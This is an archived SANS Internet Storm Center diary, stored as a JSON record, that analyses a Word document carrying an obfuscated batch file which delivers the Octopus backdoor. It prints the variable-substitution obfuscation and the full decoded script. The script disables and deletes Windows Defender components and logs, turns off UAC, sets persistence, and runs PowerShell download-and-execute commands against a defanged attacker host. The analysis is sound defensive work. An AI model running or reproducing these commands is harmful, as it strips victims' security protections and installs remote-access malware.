{
	"id": "75837fba-ec4b-4241-9bb8-741d0c036f87",
	"created_at": "2026-04-06T00:13:09.996401Z",
	"updated_at": "2026-04-10T03:20:43.72844Z",
	"deleted_at": null,
	"sha1_hash": "708635dc3e098d4e5b68ace57967a0b5c9dd512c",
	"title": "Octopus Backdoor is Back with a New Embedded Obfuscated Bat File",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 292004,
	"plain_text": "Octopus Backdoor is Back with a New Embedded Obfuscated Bat\r\nFile\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:48:24 UTC\r\nLast week, I found another interesting Word document that delivered an interesting malicious script to potential\r\nvictims. Usually, Office documents carry VBA macros that are activated using a bit of social engineering (the\r\nclassic yellow ribbon) but this time, the document did not contain any malicious code:\r\nremnux@/MalwareZoo/20220505$ oledump.py f1763579a9319d2506ee468031e1eb1b.doc\r\n 1: 114 '\\x01CompObj'\r\n 2: 4096 '\\x05DocumentSummaryInformation'\r\n 3: 4096 '\\x05SummaryInformation'\r\n 4: 7624 '1Table'\r\n 5: 15906 'Data'\r\n 6: 4096 'WordDocument'\r\nBut you can see stream 5 is called \"Data\". When you open the document, you see this:\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 1 of 8\n\nThe document SHA256 is 6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6eand its\r\ncurrent VT score is 22/60[1]. The document contains embedded objects that look like PDF files but they are'nt:\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 2 of 8\n\nIf you follow the instruction and click on one of the PDF icons (all three point to the same script), the script will\r\nbe executed. Let's have a look at it:\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 3 of 8\n\nIt looks pretty well obfuscated:\r\n%xlnlrpz%%fynwfvh%%dskbaxq%.%fynwfvh%%lxckycu%%fynwfvh% %wegkoem%%tjxpouf%%tjxpouf% %yvyapob%%eeuyvwk\r\nIn Microsoft batch files, \"%...%\" represents a variable. If you look carefully at the code, you see that we just have\r\na suite of environment variables with, sometimes, clear characters. Those characters are special ones like \"/\", \".\"\r\nor numbers. The obfuscation technique used here is pretty simple but efficient. Environment variables just contain\r\nletters from A to Z:\r\nset wegkoem=a\r\nset bpltpmn=b\r\nset khoziql=c\r\nset tjxpouf=d\r\nset fynwfvh=e\r\nset gfuxihu=f\r\nset dskbaxq=g\r\nset yvyapob=h\r\nset pjdvllg=i\r\nset mnmpqbg=j\r\nset eeuyvwk=k\r\nset mkmhtbo=l\r\nset hxiqvtv=m\r\nset bysdcmi=n\r\nset nutqtmu=o\r\nset brlbmmf=p\r\nset hoahisa=q\r\nset xlnlrpz=r\r\nset ybbwhci=s\r\nset flbzyhx=t\r\nset jxdklrj=u\r\nset cbwqklh=v\r\nset rmyyyjm=w\r\nset lxckycu=x\r\nset tjtkrhi=y\r\nset ikoiset=z\r\nOnce you replaced all variables with the corresponding letters, the script is easier to read but you still have to\r\nclean it:\r\n@%e%%c%%h%%o% %o%%f%%f%\r\nHere is the complete decoded script:\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 4 of 8\n\n@echo off\r\nreg delete \"hklm\\software\\policies\\microsoft\\windows defender\" /f\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\" /v \"disableantispyware\" /t reg_dword /d\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\" /v \"disableantivirus\" /t reg_dword /d \"1\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\mpengine\" /v \"mpenablepus\" /t reg_dword /d\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablebehaviorm\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disableioavprote\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disableonaccessp\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablerealtimem\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablescanonrea\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\reporting\" /v \"disableenhancednotification\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"disableblockatfirstseen\" /t re\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"spynetreporting\" /t reg_dword\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"submitsamplesconsent\" /t reg_d\r\nrem 0 - disable logging\r\nreg add \"hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defenderapilogger\" /v \"start\" /t reg_dw\r\nreg add \"hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defenderauditlogger\" /v \"start\" /t reg_\r\nrem disable wd tasks\r\nschtasks /change /tn \"microsoft\\windows\\exploitguard\\exploitguard mdm policy refresh\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender cache maintenance\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender cleanup\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender scheduled scan\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender verification\" /disable\r\nrem disable wd systray icon\r\nreg delete \"hklm\\software\\microsoft\\windows\\currentversion\\explorer\\startupapproved\\run\" /v \"windows\r\nreg delete \"hkcu\\software\\microsoft\\windows\\currentversion\\run\" /v \"windows defender\" /f\r\nreg delete \"hklm\\software\\microsoft\\windows\\currentversion\\run\" /v \"windowsdefender\" /f\r\nrem remove wd context menu\r\nreg delete \"hkcr\\*\\shellex\\contextmenuhandlers\\epp\" /f\r\nreg delete \"hkcr\\directory\\shellex\\contextmenuhandlers\\epp\" /f\r\nreg delete \"hkcr\\drive\\shellex\\contextmenuhandlers\\epp\" /f\r\nrem disable wd services\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdboot\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdfilter\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdnisdrv\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdnissvc\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\windefend\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\securityhealthservice\" /v \"start\" /t reg_dword /d \"4\r\nreg.exe add hklm\\software\\microsoft\\windows\\currentversion\\policies\\system /v enablelua /t reg_dword\r\nreg add \"hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\" /v \"#one\" /t reg_sz /d \"pow\r\nreg add \"hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\" /v \"#oneupdate\" /t reg_sz /\r\n\"c:\\program files\\microsoft security client\\setup.exe\" /x /s /disableoslimit\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 5 of 8\n\nstart /b powershell add-mppreference -exclusionpath \"c:\" -force\r\nstart /b powershell add-mppreference -exclusionpath \"c:\\users\" -force\r\nstart /b powershell -w hidden \"iex(new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-g\r\n \r\nstart /b powershell -w hidden \"add-type -assemblyname system.core;iex (new-object net.webclient).down\r\nschtasks /create /sc minute /mo 60 /f /tn achromeupdater /tr \"powershell -w hidden \\\"add-type -assemb\r\nschtasks /f /create /sc minute /mo 60 /tn achromeupdateri /tr \"powershell.exe -w hidden 'iex (new-obj\r\nsc stop windefend\r\nsc config windefend start= disabled\r\nsc delete windefend\r\nsc stop wdnissvc\r\nsc config wdnissvc start= disabled\r\nsc delete wdnissvc\r\nsc stop sense\r\nsc config sense start= disabled\r\nsc delete sense\r\nsc stop wuauserv\r\nsc config wuauserv start= disabled\r\nsc stop usosvc\r\nsc config usosvc start= disabled\r\nsc stop waasmedicsvc\r\nsc config waasmedicsvc start= disabled\r\nsc stop securityhealthservice\r\nsc config securityhealthservice start= disabled\r\nsc delete securityhealthservice\r\nsc stop sdrsvc\r\nsc config sdrsvc start= disabled\r\nsc stop wscsvc\r\nsc config wscsvc start= disabled\r\nsc stop wdiservicehost\r\nsc config wdiservicehost start= disabled\r\nsc stop wdisystemhost\r\nsc config wdisystemhost start= disabled\r\nsc stop installservice\r\nsc config installservice start= disabled\r\nsc stop vaultsvc\r\nsc config vaultsvc start= disabled\r\nsc stop spooler\r\nsc config spooler start= disabled\r\nsc stop licensemanager\r\nsc config licensemanager start= disabled\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 6 of 8\n\nsc stop diagtrack\r\nsc config diagtrack start= disabled\r\ntaskkill /f /im smartscreen.exe\r\ntaskkill /f /im securityhealthservice.exe\r\ncd c:\\\r\ncd c:\\program files\\\r\nrd /s /q \"windows defender\"\r\nrd /s /q \"windows defender advanced threat protection\"\r\nrd /s /q \"windows security\"\r\ncd c:\\program files (x86)\\\r\nrd /s /q \"windows defender\"\r\ncd c:\\programdata\\microsoft\r\nrd /s /q \"windows defender\"\r\nrd /s /q \"windows defender advanced threat protection\"\r\nrd /s /q \"windows security health\"\r\ncd c:\\\r\ncd windows\r\ncd system32\r\ndel /f windowsupdateelevatedinstaller.exe\r\ndel /f securityhealthsystray.exe\r\ndel /f securityhealthservice.exe\r\ndel /f securityhealthhost.exe\r\ndel /f securitycenterbroker.dll\r\ndel /f securitycenterbrokerps.dll\r\ndel /f securityhealthagent.dll\r\ndel /f securityhealthproxystub.dll\r\ndel /f securityhealthsso.dll\r\ndel /f smartscreensettings.exe\r\ndel /f smartscreenps.dll\r\ndel /f smartscreen.exe\r\ndel /f windows.security.integrity.dll\r\ndel /f windowsdefenderapplicationguardcsp.dll\r\ndel /f wscsvc.dll\r\ndel /f wscsvc.dll.mui\r\ndel /f wsecedit.dll\r\ncd winevt\\logs\r\ndel /f microsoft-windows-windows defender4operational.evtx\r\ndel /f microsoft-windows-windows defender4whc.evtx\r\ndel /f microsoft-windows-security-audit-configuration-client4operational.evtx\r\ndel /f microsoft-windows-security-enterprisedata-filerevocationmanager4operational.evtx\r\ndel /f microsoft-windows-security-netlogon\r\nThe domain hpsj[.]firewall-gateway[.]net is well-known, it's a good old Octopus backdoor. I already wrote a diary\r\nabout it in 2020[2]! But it seems to be back with a simple but effective obfuscation technique.\r\n[1] https://www.virustotal.com/gui/file/6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6e\r\n[2] https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 7 of 8\n\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/rss/28628\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/28628"
	],
	"report_names": [
		"28628"
	],
	"threat_actors": [],
	"ts_created_at": 1775434389,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.pdf",
		"text": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.txt",
		"img": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.jpg"
	}
}